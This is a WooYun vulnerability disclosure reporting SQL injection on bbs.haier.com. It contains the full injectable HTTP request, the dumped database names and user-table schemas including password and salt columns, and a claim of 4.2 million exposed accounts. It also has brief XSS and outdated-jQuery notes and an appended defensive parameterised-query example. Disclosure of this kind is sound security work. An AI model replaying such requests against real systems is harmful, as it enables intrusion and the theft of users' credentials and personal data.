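2014-12-13: Details reported to the vendor; awaiting vendor handling
2014-12-16: Vendor confirmed; details disclosed to the vendor only
2014-12-26: Details disclosed to core white hats and experts in related fields
2015-01-05: Details disclosed to regular white hats
2015-01-15: Details disclosed to intern white hats
2015-01-27: Details disclosed to the public

This is not the same forum as in the previously submitted vulnerability. The two forums do not share accounts, and their data volumes differ:
trs_common_member | 4222429
qwh_members | 73561

1. The previous submission was tbbs.haier.com (http://wooyun.org/bugs/wooyun-2014-086690); this one is bbs.haier.com.
2. tbbs has 22 databases; bbs has 4:
[*] discuz15
[*] information_schema
[*] newdiscuz15
[*] test

3. SQL injection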
POST /HaierBBS/thrdapplycount/gettolcount.do HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Referer: http://bbs.haier.com/
Cookie: JSESSIONID=FDC54A75489FA666619AA7C8CDF0CB72.jvm1; idsALUserSource=""
Host: bbs.haier.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

sourceId=455767%2C421738%2C415616%2C256510%2C148866%2C148801%2C479712%2C484890%2C484569%2C484595%2C479986%2C484188&type=1
Database: discuz15
Table: uc_members
[13 columns]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| babao         | double      |
| email         | varchar(96) |
| lastloginip   | double      |
| lastlogintime | double      |
| myid          | varchar(90) |
| myidkey       | varchar(48) |
| password      | varchar(96) |
| regdate       | double      |
| regip         | varchar(45) |
| salt          | varchar(18) |
| secques       | varchar(24) |
| uid           | int(11)     |
| username      | varchar(45) |
+---------------+-------------+

Database: discuz15
Table: trs_common_member
[40 columns]
+------------------+-----------------------+
| Column           | Type                  |
+------------------+-----------------------+
| accessmasks      | tinyint(1)            |
| adminid          | int(11)               |
| adress           | varchar(100)          |
| allowadmincp     | tinyint(1)            |
| avatar           | varchar(200)          |
| avatarstatus     | tinyint(1)            |
| birthday         | varchar(100)          |
| city             | varchar(100)          |
| conisbind        | tinyint(1) unsigned   |
| credits          | int(10)               |
| education        | varchar(100)          |
| educationid      | varchar(10)           |
| email            | varchar(100)          |
| emailstatus      | tinyint(1)            |
| extgroupids      | char(20)              |
| firstname        | varchar(100)          |
| gender           | int(1)                |
| groupexpiry      | int(10) unsigned      |
| groupid          | smallint(6) unsigned  |
| lastloginip      | varchar(255)          |
| lastlogintime    | int(10)               |
| memcercode       | varchar(100)          |
| mobile           | varchar(255)          |
| newpm            | smallint(6) unsigned  |
| newprompt        | smallint(6) unsigned  |
| notifysound      | tinyint(1)            |
| password         | char(32)              |
| profession       | varchar(100)          |
| professionid     | varchar(10)           |
| province         | varchar(100)          |
| realname         | varchar(255)          |
| regdate          | int(10) unsigned      |
| regip            | varchar(255)          |
| remark           | text                  |
| status           | tinyint(1)            |
| telephone        | varchar(255)          |
| timeoffset       | char(4)               |
| uid              | mediumint(8) unsigned |
| username         | varchar(50)           |
| videophotostatus | tinyint(1)            |
+------------------+-----------------------+
4222429 user names and passwords

4. An XSS as well

5. jQuery
http://bbs.haier.com/was5/web/js/jquery.min.js
/*!
 * jQuery JavaScript Library v1.4.2
 * http://jquery.com/
 *
 * Copyright 2010, John Resig
 * Dual licensed under the MIT or GPL Version 2 licenses.
 * http://jquery.org/license
 *
 * Includes Sizzle.js
 * http://sizzlejs.com/
 * Copyright 2010, The Dojo Foundation
 * Released under the MIT, BSD, and GPL Licenses.
 *
 * Date: Sat Feb 13 22:33:48 2010 -0500
 */
Filter the input.
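
An added example, not part of the original report and not the vendor's code: one way to handle a comma-separated ID list shaped like the sourceId field in the request above is to parse it strictly into integers and bind every value as a query parameter instead of concatenating it into SQL. The report does not say which parameter was injectable; the table and column names, the allowed type values, the list cap and the use of sqlite3 as a stand-in database are assumptions.

```python
import sqlite3

MAX_IDS = 50  # assumed cap on how many ids one request may carry


def parse_id_list(raw, max_ids=MAX_IDS):
    """Turn '455767,421738' into [455767, 421738]; reject anything else."""
    parts = raw.split(",")
    if len(parts) > max_ids:
        raise ValueError("too many ids")
    ids = []
    for part in parts:
        # ASCII digits only: no signs, spaces, quotes, comments or Unicode digits.
        if not (part.isascii() and part.isdigit()) or len(part) > 10:
            raise ValueError("invalid id: %r" % part)
        ids.append(int(part))
    return ids


def count_by_source(conn, raw_source_ids, raw_type):
    """Per-id counts for a request shaped like sourceId=<list>&type=<n>."""
    ids = parse_id_list(raw_source_ids)
    if raw_type not in ("1", "2"):  # assumed allow-list of type values
        raise ValueError("invalid type")
    # Only the number of "?" markers depends on the input; the values are bound.
    marks = ",".join("?" * len(ids))
    sql = ("SELECT source_id, COUNT(*) FROM thread_apply "
           "WHERE type = ? AND source_id IN (" + marks + ") "
           "GROUP BY source_id ORDER BY source_id")
    return conn.execute(sql, [int(raw_type)] + ids).fetchall()


def demo_db():
    """Constructed sample data; thread_apply is a hypothetical table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE thread_apply (source_id INTEGER, type INTEGER)")
    conn.executemany("INSERT INTO thread_apply VALUES (?, ?)",
                     [(455767, 1), (455767, 1), (421738, 1), (421738, 2)])
    return conn


if __name__ == "__main__":
    db = demo_db()
    print(count_by_source(db, "455767,421738,415616", "1"))
    for bad in ("455767,421738 OR 1=1", "455767,,421738", "1'"):
        try:
            count_by_source(db, bad, "1")
        except ValueError as exc:
            print("rejected:", exc)
```

Rejecting the whole request on the first malformed element, rather than stripping characters and continuing, keeps the accepted input set small enough to reason about and gives monitoring a clean signal to alert on.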
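Severity: High
Vulnerability Rank: 10
Confirmed: 2014-12-16 17:49
Thanks to sm0nk of the WooYun platform for the testing and the reminder; we have assigned staff to handle it. After the tbbs vulnerability was reported, this bbs vulnerability is being fixed at the same time as well. Let's still rate it high, rank 10.
None yet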